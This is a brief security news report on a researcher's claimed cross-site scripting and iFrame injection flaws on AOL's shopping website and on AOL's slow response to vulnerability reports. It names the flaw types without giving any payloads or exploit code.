Indian Security researcher Deepanker Verma claims to have uncovered cross-site scripting (XSS) and iFrame injection vulnerabilities on the shopping website of AOL.
According to the expert, cybercriminals could leverage these flaws to steal user cookies and hijack sessions.
To demonstrate the fact that iFrames can be injected into the AOL Shopping website, Verma has added an iFrame that points to his own site (see screenshot).
“This is a popular shopping website with millions of users. An attacker can trick innocent users and use this vulnerability for malicious task,” the researcher wrote on Hacking Tricks.
The expert says that the vulnerabilities have been reported to AOL, but so far they haven’t responded to his notifications.
Update. According to security researcher Suriya Prakash, AOL doesn't handle vulnerability reports too well.
He says that the company still hasn't addressed the XSS issues he reported to them a few months ago.
Moreover, it turns out that a security hole similar to the one identified by Verma was found by the TeamHav0k hacker group almost one year ago.